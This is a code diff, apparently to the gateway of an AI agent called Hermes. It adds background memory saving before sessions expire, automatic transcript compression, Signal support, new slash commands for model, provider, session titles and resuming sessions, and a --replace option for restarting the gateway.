self.session_store = SessionStore(
self.config.sessions_dir, self.config,
has_active_processes_fn=lambda key: process_registry.has_active_for_session(key),
on_auto_reset=self._flush_memories_before_reset,
)
self.delivery_router = DeliveryRouter(self.config)
self._running = False
@@ -209,15 +237,14 @@ class GatewayRunner:
from gateway.hooks import HookRegistry
self.hooks = HookRegistry()
def _flush_memories_before_reset(self, old_entry):
"""Prompt the agent to save memories/skills before an auto-reset.
Called synchronously by SessionStore before destroying an expired session.
Loads the transcript, gives the agent a real turn with memory + skills
tools, and explicitly asks it to preserve anything worth keeping.
def _flush_memories_for_session(self, old_session_id: str):
"""Prompt the agent to save memories/skills before context is lost.
Synchronous worker — meant to be called via run_in_executor from
an async context so it doesn't block the event loop.
"""
try:
history = self.session_store.load_transcript(old_entry.session_id)
history = self.session_store.load_transcript(old_session_id)
if not history or len(history) < 4:
return
@@ -231,7 +258,7 @@ class GatewayRunner:
max_iterations=8,
quiet_mode=True,
enabled_toolsets=["memory", "skills"],
session_id=old_entry.session_id,
session_id=old_session_id,
)
# Build conversation history from transcript
@@ -260,9 +287,14 @@ class GatewayRunner:
user_message=flush_prompt,
conversation_history=msgs,
)
logger.info("Pre-reset save completed for session %s", old_entry.session_id)
logger.info("Pre-reset memory flush completed for session %s", old_session_id)
except Exception as e:
logger.debug("Pre-reset save failed for session %s: %s", old_entry.session_id, e)
logger.debug("Pre-reset memory flush failed for session %s: %s", old_session_id, e)
async def _async_flush_memories(self, old_session_id: str):
"""Run the sync memory flush in a thread pool so it won't block the event loop."""
loop = asyncio.get_event_loop()
await loop.run_in_executor(None, self._flush_memories_for_session, old_session_id)
@staticmethod
def _load_prefill_messages() -> List[Dict[str, Any]]:
@@ -330,7 +362,7 @@ class GatewayRunner:
Checks HERMES_REASONING_EFFORT env var first, then agent.reasoning_effort
in config.yaml. Valid: "xhigh", "high", "medium", "low", "minimal", "none".
Returns None to use default (xhigh).
Returns None to use default (medium).
"""
effort = os.getenv("HERMES_REASONING_EFFORT", "")
if not effort:
@@ -351,7 +383,7 @@ class GatewayRunner:
valid = ("xhigh", "high", "medium", "low", "minimal")
if effort in valid:
return {"enabled": True, "effort": effort}
logger.warning("Unknown reasoning_effort '%s', using default (xhigh)", effort)
logger.warning("Unknown reasoning_effort '%s', using default (medium)", effort)
return None
@staticmethod
@@ -368,6 +400,26 @@ class GatewayRunner:
pass
return {}
@staticmethod
def _load_fallback_model() -> dict | None:
"""Load fallback model config from config.yaml.
Returns a dict with 'provider' and 'model' keys, or None if
not configured / both fields empty.
"""
try:
import yaml as _y
cfg_path = _hermes_home / "config.yaml"
if cfg_path.exists():
with open(cfg_path) as _f:
cfg = _y.safe_load(_f) or {}
fb = cfg.get("fallback_model", {}) or {}
if fb.get("provider") and fb.get("model"):
return fb
except Exception:
pass
return None
async def start(self) -> bool:
"""
Start the gateway and all configured platform adapters.
@@ -464,10 +516,50 @@ class GatewayRunner:
# Check if we're restarting after a /update command
await self._send_update_notification()
# Start background session expiry watcher for proactive memory flushing
asyncio.create_task(self._session_expiry_watcher())
logger.info("Press Ctrl+C to stop")
return True
async def _session_expiry_watcher(self, interval: int = 300):
"""Background task that proactively flushes memories for expired sessions.
Runs every `interval` seconds (default 5 min). For each session that
has expired according to its reset policy, flushes memories in a thread
pool and marks the session so it won't be flushed again.
This means memories are already saved by the time the user sends their
next message, so there's no blocking delay.
"""
await asyncio.sleep(60) # initial delay — let the gateway fully start
while self._running:
try:
self.session_store._ensure_loaded()
for key, entry in list(self.session_store._entries.items()):
if entry.session_id in self.session_store._pre_flushed_sessions:
continue # already flushed this session
if not self.session_store._is_session_expired(entry):
continue # session still active
# Session has expired — flush memories in the background
logger.info(
"Session %s expired (key=%s), flushing memories proactively",
entry.session_id, key,
)
try:
await self._async_flush_memories(entry.session_id)
self.session_store._pre_flushed_sessions.add(entry.session_id)
except Exception as e:
logger.debug("Proactive memory flush failed for %s: %s", entry.session_id, e)
except Exception as e:
logger.debug("Session expiry watcher error: %s", e)
# Sleep in small increments so we can stop quickly
for _ in range(interval):
if not self._running:
break
await asyncio.sleep(1)
async def stop(self) -> None:
"""Stop the gateway and disconnect all adapters."""
logger.info("Stopping gateway...")
@@ -526,6 +618,13 @@ class GatewayRunner:
return None
return SlackAdapter(config)
elif platform == Platform.SIGNAL:
from gateway.platforms.signal import SignalAdapter, check_signal_requirements
if not check_signal_requirements():
logger.warning("Signal: SIGNAL_HTTP_URL or SIGNAL_ACCOUNT not configured")
return None
return SignalAdapter(config)
elif platform == Platform.HOMEASSISTANT:
from gateway.platforms.homeassistant import HomeAssistantAdapter, check_ha_requirements
if not check_ha_requirements():
@@ -561,12 +660,14 @@ class GatewayRunner:
Platform.DISCORD: "DISCORD_ALLOWED_USERS",
Platform.WHATSAPP: "WHATSAPP_ALLOWED_USERS",
Platform.SLACK: "SLACK_ALLOWED_USERS",
Platform.SIGNAL: "SIGNAL_ALLOWED_USERS",
}
platform_allow_all_map = {
Platform.TELEGRAM: "TELEGRAM_ALLOW_ALL_USERS",
Platform.DISCORD: "DISCORD_ALLOW_ALL_USERS",
Platform.WHATSAPP: "WHATSAPP_ALLOW_ALL_USERS",
Platform.SLACK: "SLACK_ALLOW_ALL_USERS",
Platform.SIGNAL: "SIGNAL_ALLOW_ALL_USERS",
}
# Per-platform allow-all flag (e.g., DISCORD_ALLOW_ALL_USERS=true)
@@ -664,7 +765,8 @@ class GatewayRunner:
# Emit command:* hook for any recognized slash command
_known_commands = {"new", "reset", "help", "status", "stop", "model",
"personality", "retry", "undo", "sethome", "set-home",
"compress", "usage", "insights", "reload-mcp", "update"}
"compress", "usage", "insights", "reload-mcp", "reload_mcp",
"update", "title", "resume", "provider"}
if command and command in _known_commands:
await self.hooks.emit(f"command:{command}", {
"platform": source.platform.value if source.platform else "",
@@ -688,6 +790,9 @@ class GatewayRunner:
if command == "model":
return await self._handle_model_command(event)
if command == "provider":
return await self._handle_provider_command(event)
if command == "personality":
return await self._handle_personality_command(event)
@@ -709,11 +814,17 @@ class GatewayRunner:
if command == "insights":
return await self._handle_insights_command(event)
if command == "reload-mcp":
if command in ("reload-mcp", "reload_mcp"):
return await self._handle_reload_mcp_command(event)
if command == "update":
return await self._handle_update_command(event)
if command == "title":
return await self._handle_title_command(event)
if command == "resume":
return await self._handle_resume_command(event)
# Skill slash commands: /skill-name loads the skill and sends to agent
if command:
@@ -788,6 +899,195 @@ class GatewayRunner:
# Load conversation history from transcript
history = self.session_store.load_transcript(session_entry.session_id)
# -----------------------------------------------------------------
# Session hygiene: auto-compress pathologically large transcripts
#
# Long-lived gateway sessions can accumulate enough history that
# every new message rehydrates an oversized transcript, causing
# repeated truncation/context failures. Detect this early and
# compress proactively — before the agent even starts. (#628)
#
# Thresholds are derived from the SAME compression config the
# agent uses (compression.threshold × model context length) so
# CLI and messaging platforms behave identically.
# -----------------------------------------------------------------
if history and len(history) >= 4:
from agent.model_metadata import (
estimate_messages_tokens_rough,
get_model_context_length,
)
# Read model + compression config from config.yaml — same
# source of truth the agent itself uses.
_hyg_model = "anthropic/claude-sonnet-4.6"
_hyg_threshold_pct = 0.85
_hyg_compression_enabled = True
try:
_hyg_cfg_path = _hermes_home / "config.yaml"
if _hyg_cfg_path.exists():
import yaml as _hyg_yaml
with open(_hyg_cfg_path) as _hyg_f:
_hyg_data = _hyg_yaml.safe_load(_hyg_f) or {}
# Resolve model name (same logic as run_sync)
_model_cfg = _hyg_data.get("model", {})
if isinstance(_model_cfg, str):
_hyg_model = _model_cfg
elif isinstance(_model_cfg, dict):
_hyg_model = _model_cfg.get("default", _hyg_model)
# Read compression settings
_comp_cfg = _hyg_data.get("compression", {})
if isinstance(_comp_cfg, dict):
_hyg_threshold_pct = float(
_comp_cfg.get("threshold", _hyg_threshold_pct)
)
_hyg_compression_enabled = str(
_comp_cfg.get("enabled", True)
).lower() in ("true", "1", "yes")
except Exception:
pass
# Also check env overrides (same as run_agent.py)
_hyg_threshold_pct = float(
os.getenv("CONTEXT_COMPRESSION_THRESHOLD", str(_hyg_threshold_pct))
)
if os.getenv("CONTEXT_COMPRESSION_ENABLED", "").lower() in ("false", "0", "no"):
_hyg_compression_enabled = False
if _hyg_compression_enabled:
_hyg_context_length = get_model_context_length(_hyg_model)
_compress_token_threshold = int(
_hyg_context_length * _hyg_threshold_pct
)
# Warn if still huge after compression (95% of context)
_warn_token_threshold = int(_hyg_context_length * 0.95)
_msg_count = len(history)
_approx_tokens = estimate_messages_tokens_rough(history)
_needs_compress = _approx_tokens >= _compress_token_threshold
if _needs_compress:
logger.info(
"Session hygiene: %s messages, ~%s tokens — auto-compressing "
"(threshold: %s%% of %s = %s tokens)",
_msg_count, f"{_approx_tokens:,}",
int(_hyg_threshold_pct * 100),
f"{_hyg_context_length:,}",
f"{_compress_token_threshold:,}",
)
_hyg_adapter = self.adapters.get(source.platform)
if _hyg_adapter:
try:
await _hyg_adapter.send(
source.chat_id,
f"🗜️ Session is large ({_msg_count} messages, "
f"~{_approx_tokens:,} tokens). Auto-compressing..."
)
except Exception:
pass
try:
from run_agent import AIAgent
_hyg_runtime = _resolve_runtime_agent_kwargs()
if _hyg_runtime.get("api_key"):
_hyg_msgs = [
{"role": m.get("role"), "content": m.get("content")}
for m in history
if m.get("role") in ("user", "assistant")
and m.get("content")
]
if len(_hyg_msgs) >= 4:
_hyg_agent = AIAgent(
**_hyg_runtime,
max_iterations=4,
quiet_mode=True,
enabled_toolsets=["memory"],
session_id=session_entry.session_id,
)
loop = asyncio.get_event_loop()
_compressed, _ = await loop.run_in_executor(
None,
lambda: _hyg_agent._compress_context(
_hyg_msgs, "",
approx_tokens=_approx_tokens,
),
)
self.session_store.rewrite_transcript(
session_entry.session_id, _compressed
)
history = _compressed
_new_count = len(_compressed)
_new_tokens = estimate_messages_tokens_rough(
_compressed
)
logger.info(
"Session hygiene: compressed %s%s msgs, "
"~%s → ~%s tokens",
_msg_count, _new_count,
f"{_approx_tokens:,}", f"{_new_tokens:,}",
)
if _hyg_adapter:
try:
await _hyg_adapter.send(
source.chat_id,
f"🗜️ Compressed: {_msg_count}"
f"{_new_count} messages, "
f"~{_approx_tokens:,}"
f"~{_new_tokens:,} tokens"
)
except Exception:
pass
# Still too large after compression — warn user
if _new_tokens >= _warn_token_threshold:
logger.warning(
"Session hygiene: still ~%s tokens after "
"compression — suggesting /reset",
f"{_new_tokens:,}",
)
if _hyg_adapter:
try:
await _hyg_adapter.send(
source.chat_id,
"⚠️ Session is still very large "
"after compression "
f"(~{_new_tokens:,} tokens). "
"Consider using /reset to start "
"fresh if you experience issues."
)
except Exception:
pass
except Exception as e:
logger.warning(
"Session hygiene auto-compress failed: %s", e
)
# Compression failed and session is dangerously large
if _approx_tokens >= _warn_token_threshold:
_hyg_adapter = self.adapters.get(source.platform)
if _hyg_adapter:
try:
await _hyg_adapter.send(
source.chat_id,
f"⚠️ Session is very large "
f"({_msg_count} messages, "
f"~{_approx_tokens:,} tokens) and "
"auto-compression failed. Consider "
"using /compress or /reset to avoid "
"issues."
)
except Exception:
pass
# First-message onboarding -- only on the very first interaction ever
if not history and not self.session_store.has_any_sessions():
context_prompt += (
@@ -1012,33 +1312,12 @@ class GatewayRunner:
# Get existing session key
session_key = self.session_store._generate_session_key(source)
# Memory flush before reset: load the old transcript and let a
# temporary agent save memories before the session is wiped.
# Flush memories in the background (fire-and-forget) so the user
# gets the "Session reset!" response immediately.
try:
old_entry = self.session_store._entries.get(session_key)
if old_entry:
old_history = self.session_store.load_transcript(old_entry.session_id)
if old_history:
from run_agent import AIAgent
loop = asyncio.get_event_loop()
_flush_kwargs = _resolve_runtime_agent_kwargs()
def _do_flush():
tmp_agent = AIAgent(
**_flush_kwargs,
max_iterations=5,
quiet_mode=True,
enabled_toolsets=["memory"],
session_id=old_entry.session_id,
)
# Build simple message list from transcript
msgs = []
for m in old_history:
role = m.get("role")
content = m.get("content")
if role in ("user", "assistant") and content:
msgs.append({"role": role, "content": content})
tmp_agent.flush_memories(msgs)
await loop.run_in_executor(None, _do_flush)
asyncio.create_task(self._async_flush_memories(old_entry.session_id))
except Exception as e:
logger.debug("Gateway memory flush on reset failed: %s", e)
@@ -1105,12 +1384,15 @@ class GatewayRunner:
"`/reset` — Reset conversation history",
"`/status` — Show session info",
"`/stop` — Interrupt the running agent",
"`/model [name]` — Show or change the model",
"`/model [provider:model]` — Show/change model (or switch provider)",
"`/provider` — Show available providers and auth status",
"`/personality [name]` — Set a personality",
"`/retry` — Retry your last message",
"`/undo` — Remove the last exchange",
"`/sethome` — Set this chat as the home channel",
"`/compress` — Compress conversation context",
"`/title [name]` — Set or show the session title",
"`/resume [name]` — Resume a previously-named session",
"`/usage` — Show token usage for this session",
"`/insights [days]` — Show usage insights and analytics",
"`/reload-mcp` — Reload MCP servers from config",
@@ -1131,13 +1413,20 @@ class GatewayRunner:
async def _handle_model_command(self, event: MessageEvent) -> str:
"""Handle /model command - show or change the current model."""
import yaml
from hermes_cli.models import (
parse_model_input,
validate_requested_model,
curated_models_for_provider,
normalize_provider,
_PROVIDER_LABELS,
)
args = event.get_command_args().strip()
config_path = _hermes_home / 'config.yaml'
# Resolve current model the same way the agent init does:
# env vars first, then config.yaml always overrides.
# Resolve current model and provider from config
current = os.getenv("HERMES_MODEL") or os.getenv("LLM_MODEL") or "anthropic/claude-opus-4.6"
current_provider = "openrouter"
try:
if config_path.exists():
with open(config_path) as f:
@@ -1147,39 +1436,173 @@ class GatewayRunner:
current = model_cfg
elif isinstance(model_cfg, dict):
current = model_cfg.get("default", current)
current_provider = model_cfg.get("provider", current_provider)
except Exception:
pass
# Resolve "auto" to the actual provider using credential detection
current_provider = normalize_provider(current_provider)
if current_provider == "auto":
try:
from hermes_cli.auth import resolve_provider as _resolve_provider
current_provider = _resolve_provider(current_provider)
except Exception:
current_provider = "openrouter"
# Detect custom endpoint: provider resolved to openrouter but a custom
# base URL is configured — the user set up a custom endpoint.
if current_provider == "openrouter" and os.getenv("OPENAI_BASE_URL", "").strip():
current_provider = "custom"
if not args:
return f"🤖 **Current model:** `{current}`\n\nTo change: `/model provider/model-name`"
provider_label = _PROVIDER_LABELS.get(current_provider, current_provider)
lines = [
f"🤖 **Current model:** `{current}`",
f"**Provider:** {provider_label}",
"",
]
curated = curated_models_for_provider(current_provider)
if curated:
lines.append(f"**Available models ({provider_label}):**")
for mid, desc in curated:
marker = "" if mid == current else ""
label = f" _{desc}_" if desc else ""
lines.append(f"• `{mid}`{label}{marker}")
lines.append("")
lines.append("To change: `/model model-name`")
lines.append("Switch provider: `/model provider:model-name`")
return "\n".join(lines)
if "/" not in args:
return (
f"🤖 Invalid model format: `{args}`\n\n"
f"Use `provider/model-name` format, e.g.:\n"
f"• `anthropic/claude-sonnet-4`\n"
f"• `google/gemini-2.5-pro`\n"
f"• `openai/gpt-4o`"
)
# Parse provider:model syntax
target_provider, new_model = parse_model_input(args, current_provider)
provider_changed = target_provider != current_provider
# Write to config.yaml (source of truth), same pattern as CLI save_config_value.
# Resolve credentials for the target provider (for API probe)
api_key = os.getenv("OPENROUTER_API_KEY") or os.getenv("OPENAI_API_KEY") or ""
base_url = "https://openrouter.ai/api/v1"
if provider_changed:
try:
from hermes_cli.runtime_provider import resolve_runtime_provider
runtime = resolve_runtime_provider(requested=target_provider)
api_key = runtime.get("api_key", "")
base_url = runtime.get("base_url", "")
except Exception as e:
provider_label = _PROVIDER_LABELS.get(target_provider, target_provider)
return f"⚠️ Could not resolve credentials for provider '{provider_label}': {e}"
else:
# Use current provider's base_url from config or registry
try:
from hermes_cli.runtime_provider import resolve_runtime_provider
runtime = resolve_runtime_provider(requested=current_provider)
api_key = runtime.get("api_key", "")
base_url = runtime.get("base_url", "")
except Exception:
pass
# Validate the model against the live API
try:
validation = validate_requested_model(
new_model,
target_provider,
api_key=api_key,
base_url=base_url,
)
except Exception:
validation = {"accepted": True, "persist": True, "recognized": False, "message": None}
if not validation.get("accepted"):
msg = validation.get("message", "Invalid model")
tip = "\n\nUse `/model` to see available models, `/provider` to see providers" if "Did you mean" not in msg else ""
return f"⚠️ {msg}{tip}"
# Persist to config only if validation approves
if validation.get("persist"):
try:
user_config = {}
if config_path.exists():
with open(config_path) as f:
user_config = yaml.safe_load(f) or {}
if "model" not in user_config or not isinstance(user_config["model"], dict):
user_config["model"] = {}
user_config["model"]["default"] = new_model
if provider_changed:
user_config["model"]["provider"] = target_provider
with open(config_path, 'w') as f:
yaml.dump(user_config, f, default_flow_style=False, sort_keys=False)
except Exception as e:
return f"⚠️ Failed to save model change: {e}"
# Set env vars so the next agent run picks up the change
os.environ["HERMES_MODEL"] = new_model
if provider_changed:
os.environ["HERMES_INFERENCE_PROVIDER"] = target_provider
provider_label = _PROVIDER_LABELS.get(target_provider, target_provider)
provider_note = f"\n**Provider:** {provider_label}" if provider_changed else ""
warning = ""
if validation.get("message"):
warning = f"\n⚠️ {validation['message']}"
if validation.get("persist"):
persist_note = "saved to config"
else:
persist_note = "this session only — will revert on restart"
return f"🤖 Model changed to `{new_model}` ({persist_note}){provider_note}{warning}\n_(takes effect on next message)_"
async def _handle_provider_command(self, event: MessageEvent) -> str:
"""Handle /provider command - show available providers."""
import yaml
from hermes_cli.models import (
list_available_providers,
normalize_provider,
_PROVIDER_LABELS,
)
# Resolve current provider from config
current_provider = "openrouter"
config_path = _hermes_home / 'config.yaml'
try:
user_config = {}
if config_path.exists():
with open(config_path) as f:
user_config = yaml.safe_load(f) or {}
if "model" not in user_config or not isinstance(user_config["model"], dict):
user_config["model"] = {}
user_config["model"]["default"] = args
with open(config_path, 'w') as f:
yaml.dump(user_config, f, default_flow_style=False, sort_keys=False)
except Exception as e:
return f"⚠️ Failed to save model change: {e}"
cfg = yaml.safe_load(f) or {}
model_cfg = cfg.get("model", {})
if isinstance(model_cfg, dict):
current_provider = model_cfg.get("provider", current_provider)
except Exception:
pass
# Also set env var so code reading it before the next agent init sees the update.
os.environ["HERMES_MODEL"] = args
current_provider = normalize_provider(current_provider)
if current_provider == "auto":
try:
from hermes_cli.auth import resolve_provider as _resolve_provider
current_provider = _resolve_provider(current_provider)
except Exception:
current_provider = "openrouter"
return f"🤖 Model changed to `{args}`\n_(takes effect on next message)_"
# Detect custom endpoint
if current_provider == "openrouter" and os.getenv("OPENAI_BASE_URL", "").strip():
current_provider = "custom"
current_label = _PROVIDER_LABELS.get(current_provider, current_provider)
lines = [
f"🔌 **Current provider:** {current_label} (`{current_provider}`)",
"",
"**Available providers:**",
]
providers = list_available_providers()
for p in providers:
marker = " ← active" if p["id"] == current_provider else ""
auth = "" if p["authenticated"] else ""
aliases = f" _(also: {', '.join(p['aliases'])})_" if p["aliases"] else ""
lines.append(f"{auth} `{p['id']}` — {p['label']}{aliases}{marker}")
lines.append("")
lines.append("Switch: `/model provider:model-name`")
lines.append("Setup: `hermes setup`")
return "\n".join(lines)
async def _handle_personality_command(self, event: MessageEvent) -> str:
"""Handle /personality command - list or set a personality."""
@@ -1369,6 +1792,113 @@ class GatewayRunner:
logger.warning("Manual compress failed: %s", e)
return f"Compression failed: {e}"
async def _handle_title_command(self, event: MessageEvent) -> str:
"""Handle /title command — set or show the current session's title."""
source = event.source
session_entry = self.session_store.get_or_create_session(source)
session_id = session_entry.session_id
if not self._session_db:
return "Session database not available."
title_arg = event.get_command_args().strip()
if title_arg:
# Sanitize the title before setting
try:
sanitized = self._session_db.sanitize_title(title_arg)
except ValueError as e:
return f"⚠️ {e}"
if not sanitized:
return "⚠️ Title is empty after cleanup. Please use printable characters."
# Set the title
try:
if self._session_db.set_session_title(session_id, sanitized):
return f"✏️ Session title set: **{sanitized}**"
else:
return "Session not found in database."
except ValueError as e:
return f"⚠️ {e}"
else:
# Show the current title
title = self._session_db.get_session_title(session_id)
if title:
return f"📌 Session title: **{title}**"
else:
return "No title set. Usage: `/title My Session Name`"
async def _handle_resume_command(self, event: MessageEvent) -> str:
"""Handle /resume command — switch to a previously-named session."""
if not self._session_db:
return "Session database not available."
source = event.source
session_key = build_session_key(source)
name = event.get_command_args().strip()
if not name:
# List recent titled sessions for this user/platform
try:
user_source = source.platform.value if source.platform else None
sessions = self._session_db.list_sessions_rich(
source=user_source, limit=10
)
titled = [s for s in sessions if s.get("title")]
if not titled:
return (
"No named sessions found.\n"
"Use `/title My Session` to name your current session, "
"then `/resume My Session` to return to it later."
)
lines = ["📋 **Named Sessions**\n"]
for s in titled[:10]:
title = s["title"]
preview = s.get("preview", "")[:40]
preview_part = f" — _{preview}_" if preview else ""
lines.append(f"• **{title}**{preview_part}")
lines.append("\nUsage: `/resume <session name>`")
return "\n".join(lines)
except Exception as e:
logger.debug("Failed to list titled sessions: %s", e)
return f"Could not list sessions: {e}"
# Resolve the name to a session ID
target_id = self._session_db.resolve_session_by_title(name)
if not target_id:
return (
f"No session found matching '**{name}**'.\n"
"Use `/resume` with no arguments to see available sessions."
)
# Check if already on that session
current_entry = self.session_store.get_or_create_session(source)
if current_entry.session_id == target_id:
return f"📌 Already on session **{name}**."
# Flush memories for current session before switching
try:
asyncio.create_task(self._async_flush_memories(current_entry.session_id))
except Exception as e:
logger.debug("Memory flush on resume failed: %s", e)
# Clear any running agent for this session key
if session_key in self._running_agents:
del self._running_agents[session_key]
# Switch the session entry to point at the old session
new_entry = self.session_store.switch_session(session_key, target_id)
if not new_entry:
return "Failed to switch session."
# Get the title for confirmation
title = self._session_db.get_session_title(target_id) or name
# Count messages for context
history = self.session_store.load_transcript(target_id)
msg_count = len([m for m in history if m.get("role") == "user"]) if history else 0
msg_part = f" ({msg_count} message{'s' if msg_count != 1 else ''})" if msg_count else ""
return f"↻ Resumed session **{title}**{msg_part}. Conversation restored."
async def _handle_usage_command(self, event: MessageEvent) -> str:
"""Handle /usage command -- show token usage for the session's last agent run."""
source = event.source
@@ -2166,6 +2696,7 @@ class GatewayRunner:
platform=platform_key,
honcho_session_key=session_key,
session_db=self._session_db,
fallback_model=self._fallback_model,
)
# Store agent reference for interrupt support
@@ -2437,34 +2968,77 @@ def _start_cron_ticker(stop_event: threading.Event, adapters=None, interval: int
logger.info("Cron ticker stopped")
async def start_gateway(config: Optional[GatewayConfig] = None) -> bool:
async def start_gateway(config: Optional[GatewayConfig] = None, replace: bool = False) -> bool:
"""
Start the gateway and run until interrupted.
This is the main entry point for running the gateway.
Returns True if the gateway ran successfully, False if it failed to start.
A False return causes a non-zero exit code so systemd can auto-restart.
Args:
config: Optional gateway configuration override.
replace: If True, kill any existing gateway instance before starting.
Useful for systemd services to avoid restart-loop deadlocks
when the previous process hasn't fully exited yet.
"""
# ── Duplicate-instance guard ──────────────────────────────────────
# Prevent two gateways from running under the same HERMES_HOME.
# The PID file is scoped to HERMES_HOME, so future multi-profile
# setups (each profile using a distinct HERMES_HOME) will naturally
# allow concurrent instances without tripping this guard.
from gateway.status import get_running_pid
import time as _time
from gateway.status import get_running_pid, remove_pid_file
existing_pid = get_running_pid()
if existing_pid is not None and existing_pid != os.getpid():
hermes_home = os.getenv("HERMES_HOME", "~/.hermes")
logger.error(
"Another gateway instance is already running (PID %d, HERMES_HOME=%s). "
"Use 'hermes gateway restart' to replace it, or 'hermes gateway stop' first.",
existing_pid, hermes_home,
)
print(
f"\n❌ Gateway already running (PID {existing_pid}).\n"
f" Use 'hermes gateway restart' to replace it,\n"
f" or 'hermes gateway stop' to kill it first.\n"
)
return False
if replace:
logger.info(
"Replacing existing gateway instance (PID %d) with --replace.",
existing_pid,
)
try:
os.kill(existing_pid, signal.SIGTERM)
except ProcessLookupError:
pass # Already gone
except PermissionError:
logger.error(
"Permission denied killing PID %d. Cannot replace.",
existing_pid,
)
return False
# Wait up to 10 seconds for the old process to exit
for _ in range(20):
try:
os.kill(existing_pid, 0)
_time.sleep(0.5)
except (ProcessLookupError, PermissionError):
break # Process is gone
else:
# Still alive after 10s — force kill
logger.warning(
"Old gateway (PID %d) did not exit after SIGTERM, sending SIGKILL.",
existing_pid,
)
try:
os.kill(existing_pid, signal.SIGKILL)
_time.sleep(0.5)
except (ProcessLookupError, PermissionError):
pass
remove_pid_file()
else:
hermes_home = os.getenv("HERMES_HOME", "~/.hermes")
logger.error(
"Another gateway instance is already running (PID %d, HERMES_HOME=%s). "
"Use 'hermes gateway restart' to replace it, or 'hermes gateway stop' first.",
existing_pid, hermes_home,
)
print(
f"\n❌ Gateway already running (PID {existing_pid}).\n"
f" Use 'hermes gateway restart' to replace it,\n"
f" or 'hermes gateway stop' to kill it first.\n"
f" Or use 'hermes gateway run --replace' to auto-replace.\n"
)
return False
# Sync bundled skills on gateway start (fast -- skips unchanged)
try:

View File

@@ -45,6 +45,8 @@ class SessionSource:
user_name: Optional[str] = None
thread_id: Optional[str] = None # For forum topics, Discord threads, etc.
chat_topic: Optional[str] = None # Channel topic/description (Discord, Slack)
user_id_alt: Optional[str] = None # Signal UUID (alternative to phone number)
chat_id_alt: Optional[str] = None # Signal group internal ID
@property
def description(self) -> str:
@@ -68,7 +70,7 @@ class SessionSource:
return ", ".join(parts)
def to_dict(self) -> Dict[str, Any]:
return {
d = {
"platform": self.platform.value,
"chat_id": self.chat_id,
"chat_name": self.chat_name,
@@ -78,6 +80,11 @@ class SessionSource:
"thread_id": self.thread_id,
"chat_topic": self.chat_topic,
}
if self.user_id_alt:
d["user_id_alt"] = self.user_id_alt
if self.chat_id_alt:
d["chat_id_alt"] = self.chat_id_alt
return d
@classmethod
def from_dict(cls, data: Dict[str, Any]) -> "SessionSource":
@@ -90,6 +97,8 @@ class SessionSource:
user_name=data.get("user_name"),
thread_id=data.get("thread_id"),
chat_topic=data.get("chat_topic"),
user_id_alt=data.get("user_id_alt"),
chat_id_alt=data.get("chat_id_alt"),
)
@classmethod
@@ -311,7 +320,9 @@ class SessionStore:
self._entries: Dict[str, SessionEntry] = {}
self._loaded = False
self._has_active_processes_fn = has_active_processes_fn
self._on_auto_reset = on_auto_reset # callback(old_entry) before auto-reset
# on_auto_reset is deprecated — memory flush now runs proactively
# via the background session expiry watcher in GatewayRunner.
self._pre_flushed_sessions: set = set() # session_ids already flushed by watcher
# Initialize SQLite session database
self._db = None
@@ -331,7 +342,7 @@ class SessionStore:
if sessions_file.exists():
try:
with open(sessions_file, "r") as f:
with open(sessions_file, "r", encoding="utf-8") as f:
data = json.load(f)
for key, entry_data in data.items():
self._entries[key] = SessionEntry.from_dict(entry_data)
@@ -346,13 +357,51 @@ class SessionStore:
sessions_file = self.sessions_dir / "sessions.json"
data = {key: entry.to_dict() for key, entry in self._entries.items()}
with open(sessions_file, "w") as f:
with open(sessions_file, "w", encoding="utf-8") as f:
json.dump(data, f, indent=2)
def _generate_session_key(self, source: SessionSource) -> str:
"""Generate a session key from a source."""
return build_session_key(source)
def _is_session_expired(self, entry: SessionEntry) -> bool:
"""Check if a session has expired based on its reset policy.
Works from the entry alone — no SessionSource needed.
Used by the background expiry watcher to proactively flush memories.
Sessions with active background processes are never considered expired.
"""
if self._has_active_processes_fn:
if self._has_active_processes_fn(entry.session_key):
return False
policy = self.config.get_reset_policy(
platform=entry.platform,
session_type=entry.chat_type,
)
if policy.mode == "none":
return False
now = datetime.now()
if policy.mode in ("idle", "both"):
idle_deadline = entry.updated_at + timedelta(minutes=policy.idle_minutes)
if now > idle_deadline:
return True
if policy.mode in ("daily", "both"):
today_reset = now.replace(
hour=policy.at_hour,
minute=0, second=0, microsecond=0,
)
if now.hour < policy.at_hour:
today_reset -= timedelta(days=1)
if entry.updated_at < today_reset:
return True
return False
def _should_reset(self, entry: SessionEntry, source: SessionSource) -> bool:
"""
Check if a session should be reset based on policy.
@@ -439,13 +488,11 @@ class SessionStore:
self._save()
return entry
else:
# Session is being auto-reset — flush memories before destroying
# Session is being auto-reset. The background expiry watcher
# should have already flushed memories proactively; discard
# the marker so it doesn't accumulate.
was_auto_reset = True
if self._on_auto_reset:
try:
self._on_auto_reset(entry)
except Exception as e:
logger.debug("Auto-reset callback failed: %s", e)
self._pre_flushed_sessions.discard(entry.session_id)
if self._db:
try:
self._db.end_session(entry.session_id, "session_reset")
@@ -555,7 +602,49 @@ class SessionStore:
logger.debug("Session DB operation failed: %s", e)
return new_entry
def switch_session(self, session_key: str, target_session_id: str) -> Optional[SessionEntry]:
"""Switch a session key to point at an existing session ID.
Used by ``/resume`` to restore a previously-named session.
Ends the current session in SQLite (like reset), but instead of
generating a fresh session ID, re-uses ``target_session_id`` so the
old transcript is loaded on the next message.
"""
self._ensure_loaded()
if session_key not in self._entries:
return None
old_entry = self._entries[session_key]
# Don't switch if already on that session
if old_entry.session_id == target_session_id:
return old_entry
# End the current session in SQLite
if self._db:
try:
self._db.end_session(old_entry.session_id, "session_switch")
except Exception as e:
logger.debug("Session DB end_session failed: %s", e)
now = datetime.now()
new_entry = SessionEntry(
session_key=session_key,
session_id=target_session_id,
created_at=now,
updated_at=now,
origin=old_entry.origin,
display_name=old_entry.display_name,
platform=old_entry.platform,
chat_type=old_entry.chat_type,
)
self._entries[session_key] = new_entry
self._save()
return new_entry
def list_sessions(self, active_minutes: Optional[int] = None) -> List[SessionEntry]:
"""List all sessions, optionally filtered by activity."""
self._ensure_loaded()
@@ -592,7 +681,7 @@ class SessionStore:
# Also write legacy JSONL (keeps existing tooling working during transition)
transcript_path = self.get_transcript_path(session_id)
with open(transcript_path, "a") as f:
with open(transcript_path, "a", encoding="utf-8") as f:
f.write(json.dumps(message, ensure_ascii=False) + "\n")
def rewrite_transcript(self, session_id: str, messages: List[Dict[str, Any]]) -> None:
@@ -619,7 +708,7 @@ class SessionStore:
# JSONL: overwrite the file
transcript_path = self.get_transcript_path(session_id)
with open(transcript_path, "w") as f:
with open(transcript_path, "w", encoding="utf-8") as f:
for msg in messages:
